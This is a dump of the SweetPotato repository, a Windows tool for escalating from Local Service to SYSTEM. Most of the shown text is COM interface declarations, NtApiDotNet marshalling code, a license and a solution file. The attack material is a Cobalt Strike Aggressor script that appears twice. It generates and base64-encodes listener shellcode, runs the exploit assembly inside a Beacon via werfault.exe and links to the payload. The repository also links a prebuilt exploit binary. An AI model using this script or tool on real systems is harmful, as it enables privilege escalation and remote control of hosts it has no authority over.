        void SetStateBits([In] uint grfStateBits, [In] uint grfMask);
        // The caller supplies the STATSTG array that receives the result.
        void Stat([MarshalAs(42)] [Out] STATSTG[] pstatstg, [In] uint grfStatFlag);
    }
}
28 |
29 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Com/IStream.cs:
--------------------------------------------------------------------------------
using System;
using System.Runtime.InteropServices;

namespace SweetPotato {
    /// <summary>
    /// Project-local managed declaration of the COM IStream interface. Imported via
    /// [ComImport] with the IID in the Guid attribute and an IUnknown-based vtable.
    /// </summary>
    /// <remarks>
    /// Declaration order is the vtable order and must not change. No member has
    /// [PreserveSig], so a failure HRESULT surfaces as a managed exception.
    /// </remarks>
    [ComImport, Guid("0000000c-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    public interface IStream {
        // SizeParamIndex = 1 names cb as the element count of pv for the marshaller;
        // an implementation still has to keep cb within the actual buffer.
        void Read([Out, MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbRead);
        void Write([MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbWritten);
        void Seek(long dlibMove, uint dwOrigin, out long plibNewPosition);
        void SetSize(long libNewSize);
        void CopyTo(IStream pstm, long cb, out long pcbRead, out long pcbWritten);
        void Commit(uint grfCommitFlags);
        void Revert();
        void LockRegion(long libOffset, long cb, uint dwLockType);
        void UnlockRegion(long libOffset, long cb, uint dwLockType);
        void Stat(out STATSTG pstatstg, uint grfStatFlag);
        void Clone(out IStream ppstm);
    }
}
20 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 CCob
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
// NOTE(review): the title and product read "SharpPotato" although the project and
// solution are named SweetPotato. These strings are compiled into the assembly's
// metadata, and anyone rebuilding the project can change them, so they are weak
// identifiers when matching a binary to this source.
[assembly: AssemblyTitle("SharpPotato")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SharpPotato")]
[assembly: AssemblyCopyright("Copyright © 2020")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
// It is the same value as the project GUID in SweetPotato.sln. As an assembly-level
// attribute it is stored in the compiled binary, but it changes with any edit here.
[assembly: Guid("1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/README.md:
--------------------------------------------------------------------------------
1 | # SweetPotato
2 | Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019.
3 |
4 | A rewrite of JuicyPotato that is now compatible with execute-assembly, with some extras discovered by @decoder_it.
5 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/SweetPotato.cna:
--------------------------------------------------------------------------------
# SweetPotato built as C# exe

# Aggressor Script handler registered at the bottom of this file under the name
# "SweetPotato". In the body, $1 is used as the Beacon id and $2 as the listener name.
# NOTE(review): the values fixed in this script (the "-l 6363" argument, the
# werfault.exe path and the "T1068" tag) are plain literals that an operator can
# edit, so they are only weak indicators when writing detections from this file.
# NOTE(review): the meaning of -l, -p and -s is defined by the assembly's option
# parser (Options.cs in the tree, not shown here); presumably a listen port, a
# program path and an encoded payload. Confirm against that file.
sub SweetPotato {
    local('$shellcode $arch $program $exe $parm');

    # acknowledge this command
    # (the third argument tags the task with ATT&CK technique T1068)
    btask($1, "Task Beacon to run " . listener_describe($2) . " via SweetPotato (ms16-075)", "T1068");

    # tune our parameters based on the target arch
    if (-is64 $1)
    {
        $arch = "x64";
    } else {
        $arch = "x86";
    }
    # program path handed to the assembly through -p; hard-coded, not derived from the target
    $program = "c:\\windows\\system32\\werfault.exe";
    # SweetPotato.exe is resolved relative to this script's own directory
    $exe = script_resource("SweetPotato.exe");
    # generate our shellcode
    # (the listener payload for $arch, base64-encoded so it fits in one argument)
    $shellcode = base64_encode(payload($2, $arch));
    # -c 4991D34B-80A1-4291-83B6-3328366B9097
    # (the -c option above is commented out and is not part of $parm)
    $parm = "-l 6363 "."-p $program "."-s $shellcode";
    # spawn a Beacon post-ex job with bexecute_assembly
    bexecute_assembly!($1,$exe,$parm);
    # link to our payload if it's a TCP or SMB Beacon
    beacon_link($1, $null, $2);
}
# expose the handler under the short name "SweetPotato" with the description shown to the operator
beacon_exploit_register("SweetPotato", "SweetPotato (ms16-075)", &SweetPotato);
28 |
29 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/SweetPotato.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.779
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SweetPotato", "SweetPotato.csproj", "{1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {2BF3BEBF-0E18-43E5-A34F-BC2C9ABDFEDD}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/app.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/bin/Release/SweetPotato.cna:
--------------------------------------------------------------------------------
# SweetPotato built as C# exe

# Aggressor Script handler registered at the bottom of this file under the name
# "SweetPotato". In the body, $1 is used as the Beacon id and $2 as the listener name.
# This copy under bin/Release has the same content as the SweetPotato.cna in the
# project root.
# NOTE(review): the values fixed in this script (the "-l 6363" argument, the
# werfault.exe path and the "T1068" tag) are plain literals that an operator can
# edit, so they are only weak indicators when writing detections from this file.
# NOTE(review): the meaning of -l, -p and -s is defined by the assembly's option
# parser (Options.cs in the tree, not shown here); presumably a listen port, a
# program path and an encoded payload. Confirm against that file.
sub SweetPotato {
    local('$shellcode $arch $program $exe $parm');

    # acknowledge this command
    # (the third argument tags the task with ATT&CK technique T1068)
    btask($1, "Task Beacon to run " . listener_describe($2) . " via SweetPotato (ms16-075)", "T1068");

    # tune our parameters based on the target arch
    if (-is64 $1)
    {
        $arch = "x64";
    } else {
        $arch = "x86";
    }
    # program path handed to the assembly through -p; hard-coded, not derived from the target
    $program = "c:\\windows\\system32\\werfault.exe";
    # SweetPotato.exe is resolved relative to this script's own directory
    $exe = script_resource("SweetPotato.exe");
    # generate our shellcode
    # (the listener payload for $arch, base64-encoded so it fits in one argument)
    $shellcode = base64_encode(payload($2, $arch));
    # -c 4991D34B-80A1-4291-83B6-3328366B9097
    # (the -c option above is commented out and is not part of $parm)
    $parm = "-l 6363 "."-p $program "."-s $shellcode";
    # spawn a Beacon post-ex job with bexecute_assembly
    bexecute_assembly!($1,$exe,$parm);
    # link to our payload if it's a TCP or SMB Beacon
    beacon_link($1, $null, $2);
}
# expose the handler under the short name "SweetPotato" with the description shown to the operator
beacon_exploit_register("SweetPotato", "SweetPotato (ms16-075)", &SweetPotato);
28 |
29 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/bin/Release/SweetPotato.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-CS-old/bin/Release/SweetPotato.exe
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/.vs/SweetPotato/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/.vs/SweetPotato/v16/.suo
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Com/IEnumSTATSTG.cs:
--------------------------------------------------------------------------------
using System;
using System.Runtime.InteropServices;

namespace SweetPotato {
    /// <summary>
    /// Managed declaration of the COM structured-storage enumerator IEnumSTATSTG.
    /// [ComImport] marks it as an interface defined outside this assembly; the Guid
    /// attribute carries its IID and InterfaceIsIUnknown selects an IUnknown-based
    /// (non-dispatch) vtable.
    /// </summary>
    /// <remarks>
    /// The members are declared in the order Next, Skip, Reset, Clone. For an imported
    /// COM interface the declaration order is the vtable order, so it must not change.
    /// </remarks>
    [ComImport]
    [Guid("0000000d-0000-0000-C000-000000000046")]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    public interface IEnumSTATSTG {
        // The user needs to allocate an STATSTG array whose size is celt.
        // [PreserveSig] returns the raw HRESULT as the uint result instead of
        // turning a failure code into an exception.
        [PreserveSig]
        uint
        Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out] STATSTG[] rgelt, out uint pceltFetched);

        // No [PreserveSig] on the remaining members: a failure HRESULT surfaces
        // as a managed exception.
        void Skip(uint celt);

        void Reset();

        // The return value is marshalled as a COM interface pointer.
        [return: MarshalAs(UnmanagedType.Interface)]
        IEnumSTATSTG Clone();
    }
}
22 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Com/ILockBytes.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComVisible(false)]
6 | [ComImport, InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("0000000A-0000-0000-C000-000000000046")]
7 | public interface ILockBytes {
8 | // Note: these two by-reference 32-bit integers (ULONG) could be used as return values instead,
9 | // but they are not tagged [retval] in the IDL, so for consistency's sake they stay as out parameters.
10 | void ReadAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbRead);
11 | void WriteAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbWritten);
12 | void Flush();
13 | void SetSize(long cb);
14 | void LockRegion(long libOffset, long cb, int dwLockType);
15 | void UnlockRegion(long libOffset, long cb, int dwLockType);
16 | void Stat(out System.Runtime.InteropServices.STATSTG pstatstg, int grfStatFlag);
17 | // pv is an unmanaged pointer and cb a caller-supplied count: nothing in these signatures ties cb to the size of the buffer behind pv, so an implementation has to validate both before copying.
18 | }
19 |
20 |
21 | }
22 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Com/IMarshal.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | // Numeric attribute arguments used below: InterfaceType(1) is ComInterfaceType.InterfaceIsIUnknown and MarshalAs(28) is UnmanagedType.Interface.
6 | [Guid("00000003-0000-0000-C000-000000000046")]
7 | [InterfaceType(1)]
8 | [ComConversionLoss]
9 | [ComImport]
10 | public interface IMarshal { // Managed declaration of COM IMarshal (custom marshalling); with ComImport the member order is the vtable order, so do not reorder.
11 | // No member carries [PreserveSig], so a failure HRESULT from any of these calls surfaces as a managed exception. pv and pvDestContext are raw pointers that the runtime does not validate.
12 | void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid);
13 | void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize);
14 | void MarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS);
15 | void UnmarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, out IntPtr ppv);
16 | void ReleaseMarshalData([MarshalAs(28)] [In] IStream pstm);
17 | void DisconnectObject([In] uint dwReserved);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Com/IStorage.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | // Numeric attribute arguments used below: InterfaceType(1) is ComInterfaceType.InterfaceIsIUnknown; MarshalAs(21) is UnmanagedType.LPWStr, MarshalAs(28) is UnmanagedType.Interface and MarshalAs(42) is UnmanagedType.LPArray.
6 | [InterfaceType(1)]
7 | [ComConversionLoss]
8 | [Guid("0000000B-0000-0000-C000-000000000046")]
9 | [ComImport]
10 | public interface IStorage { // Managed declaration of COM structured-storage IStorage; with ComImport the member order is the vtable order, so do not reorder. No member uses [PreserveSig], so failure HRESULTs become exceptions.
11 | void CreateStream([MarshalAs(21)] [In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm);
12 | void OpenStream([MarshalAs(21)] [In] string pwcsName, [In] IntPtr reserved1, [In] uint grfMode, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm);
13 | void CreateStorage([MarshalAs(21)] [In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStorage ppstg);
14 | void OpenStorage([MarshalAs(21)] [In] string pwcsName, [MarshalAs(28)] [In] IStorage pstgPriority, [In] uint grfMode, [In] IntPtr snbExclude, [In] uint reserved, [MarshalAs(28)] out IStorage ppstg);
15 | void CopyTo([In] uint ciidExclude, [MarshalAs(42, SizeParamIndex = 0)] [In] Guid[] rgiidExclude, [In] IntPtr snbExclude, [MarshalAs(28)] [In] IStorage pstgDest); // SizeParamIndex = 0: ciidExclude is the element count the marshaller uses for rgiidExclude.
16 | void MoveElementTo([MarshalAs(21)] [In] string pwcsName, [MarshalAs(28)] [In] IStorage pstgDest, [MarshalAs(21)] [In] string pwcsNewName, [In] uint grfFlags);
17 | void Commit([In] uint grfCommitFlags);
18 | void Revert();
19 | void EnumElements([In] uint reserved1, [In] IntPtr reserved2, [In] uint reserved3, [MarshalAs(28)] out IEnumSTATSTG ppEnum);
20 | void DestroyElement([MarshalAs(21)] [In] string pwcsName);
21 | void RenameElement([MarshalAs(21)] [In] string pwcsOldName, [MarshalAs(21)] [In] string pwcsNewName);
22 | void SetElementTimes([MarshalAs(21)] [In] string pwcsName, [MarshalAs(42)] [In] FILETIME[] pctime, [MarshalAs(42)] [In] FILETIME[] patime, [MarshalAs(42)] [In] FILETIME[] pmtime);
23 | void SetClass([In] ref Guid clsid);
24 | void SetStateBits([In] uint grfStateBits, [In] uint grfMask);
25 | void Stat([MarshalAs(42)] [Out] STATSTG[] pstatstg, [In] uint grfStatFlag); // The array is declared [Out] with no size parameter; the caller has to pass an array that is already allocated.
26 | }
27 | }
28 |
29 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Com/IStream.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComImport, Guid("0000000c-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
6 | public interface IStream { // Managed declaration of COM IStream; with ComImport the member order is the vtable order, so do not reorder. No member uses [PreserveSig], so failure HRESULTs become exceptions.
7 | void Read([Out, MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbRead); // SizeParamIndex = 1: cb is the element count the marshaller uses for pv, so cb must not exceed pv.Length.
8 | void Write([MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbWritten); // Same pairing of pv and cb as Read.
9 | void Seek(long dlibMove, uint dwOrigin, out long plibNewPosition);
10 | void SetSize(long libNewSize);
11 | void CopyTo(IStream pstm, long cb, out long pcbRead, out long pcbWritten);
12 | void Commit(uint grfCommitFlags);
13 | void Revert();
14 | void LockRegion(long libOffset, long cb, uint dwLockType);
15 | void UnlockRegion(long libOffset, long cb, uint dwLockType);
16 | void Stat(out STATSTG pstatstg, uint grfStatFlag);
17 | void Clone(out IStream ppstm);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Forms/Lock.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/NtApiDotNet/Forms/Lock.ico
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/INtTransaction.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet
16 | {
17 | /// <summary>
18 | /// Interface to abstract the kernel transaction manager support.
19 | /// </summary>
20 | public interface INtTransaction
21 | {
22 | /// <summary>
23 | /// Get handle for the transaction.
24 | /// </summary>
25 | SafeKernelObjectHandle Handle { get; }
26 |
27 | /// <summary>
28 | /// Commit the transaction.
29 | /// </summary>
30 | void Commit();
31 |
32 | /// <summary>
33 | /// Rollback the transaction.
34 | /// </summary>
35 | void Rollback();
36 |
37 | /// <summary>
38 | /// Enable the transaction for anything in the current thread context.
39 | /// </summary>
40 | /// <returns>The transaction context. This should be disposed to disable the transaction.</returns>
41 | TransactionContext Enable();
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/INdrConformantStructure.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Ndr.Marshal
16 | {
17 | /// <summary>
18 | /// Interface for a marshalled NDR conformant structure.
19 | /// </summary>
20 | /// <remarks>This interface is primarily for internal use only.</remarks>
21 | public interface INdrConformantStructure : INdrStructure
22 | {
23 | /// <summary>
24 | /// Gets the number of conformant dimensions, should be at least one.
25 | /// </summary>
26 | /// <returns>The number of conformant dimensions.</returns>
27 | int GetConformantDimensions();
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/INdrNonEncapsulatedUnion.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Ndr.Marshal
16 | {
17 | /// <summary>
18 | /// Interface for a marshalled non-encapsulated NDR union.
19 | /// </summary>
20 | /// <remarks>This interface is primarily for internal use only.</remarks>
21 | public interface INdrNonEncapsulatedUnion : INdrStructure
22 | {
23 | /// <summary>
24 | /// Marshal the union to a stream.
25 | /// </summary>
26 | /// <param name="selector">The selector for union arm.</param>
27 | /// <param name="marshal">The marshal stream.</param>
28 | void Marshal(NdrMarshalBuffer marshal, long selector);
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/INdrStructure.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Ndr.Marshal
16 | {
17 | /// <summary>
18 | /// Interface for a marshalled NDR structure.
19 | /// </summary>
20 | /// <remarks>This interface is primarily for internal use only.</remarks>
21 | public interface INdrStructure
22 | {
23 | /// <summary>
24 | /// Marshal the structure to a stream.
25 | /// </summary>
26 | /// <param name="marshal">The marshal stream.</param>
27 | void Marshal(NdrMarshalBuffer marshal);
28 | /// <summary>
29 | /// Unmarshal the structure from a stream.
30 | /// </summary>
31 | /// <param name="unmarshal">The unmarshal stream.</param>
32 | void Unmarshal(NdrUnmarshalBuffer unmarshal);
33 | /// <summary>
34 | /// Get the structure's alignment.
35 | /// </summary>
36 | /// <returns>The structure's alignment.</returns>
37 | int GetAlignment();
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/NdrContextHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
namespace NtApiDotNet.Ndr.Marshal
{
    /// <summary>
    /// Immutable value type pairing the attributes and the UUID of an NDR context handle.
    /// </summary>
    public struct NdrContextHandle
    {
        /// <summary>
        /// Attributes of the context handle.
        /// </summary>
        public int Attributes { get; }

        /// <summary>
        /// UUID of the context handle.
        /// </summary>
        public Guid Uuid { get; }

        /// <summary>
        /// Builds a handle from its two components.
        /// </summary>
        /// <param name="attributes">Context handle attributes.</param>
        /// <param name="uuid">Context handle UUID.</param>
        public NdrContextHandle(int attributes, Guid uuid)
        {
            Uuid = uuid;
            Attributes = attributes;
        }

        /// <summary>
        /// Formats the handle for display.
        /// </summary>
        /// <returns>The handle as a string: the UUID followed by the attributes.</returns>
        public override string ToString() => $"Handle: {Uuid} - Attributes: {Attributes}";
    }
}
55 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/NdrEmpty.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Ndr.Marshal
16 | {
17 | /// <summary>
18 | /// Structure to represent an empty value.
19 | /// </summary>
20 | public struct NdrEmpty
21 | {
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/NdrInterfacePointer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Rpc;
16 |
namespace NtApiDotNet.Ndr.Marshal
{
    /// <summary>
    /// NDR interface pointer: a byte blob of marshaled interface data that is
    /// written as an Int32 length followed by a conformant byte array.
    /// </summary>
    public struct NdrInterfacePointer : INdrConformantStructure
    {
        /// <summary>
        /// The marshaled interface data.
        /// </summary>
        public byte[] Data { get; set; }

        /// <summary>
        /// Wraps an existing blob of marshaled interface data.
        /// </summary>
        /// <param name="data">The marshaled interface data.</param>
        public NdrInterfacePointer(byte[] data)
        {
            Data = data;
        }

        // A single conformant dimension: the byte array itself.
        int INdrConformantStructure.GetConformantDimensions() => 1;

        void INdrStructure.Marshal(NdrMarshalBuffer marshal)
        {
            // CheckNull is called before Data.Length is read; presumably it rejects a null blob.
            RpcUtils.CheckNull(Data, "Data");
            int length = Data.Length;
            marshal.WriteInt32(length);
            marshal.WriteConformantByteArray(Data, length);
        }

        void INdrStructure.Unmarshal(NdrUnmarshalBuffer unmarshal)
        {
            // The Int32 length field is consumed and discarded; the size of Data is whatever
            // ReadConformantByteArray returns and is not cross-checked against that field.
            // NOTE(review): when the stream is untrusted, confirm the reader bounds the
            // conformance count against the bytes actually available.
            unmarshal.ReadInt32();
            Data = unmarshal.ReadConformantByteArray();
        }

        int INdrStructure.GetAlignment() => 4;
    }
}
62 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/NdrPipe.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
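namespace NtApiDotNet.Ndr.Marshal
{
    /// <summary>
    /// Placeholder for a NDR pipe type.
    /// </summary>
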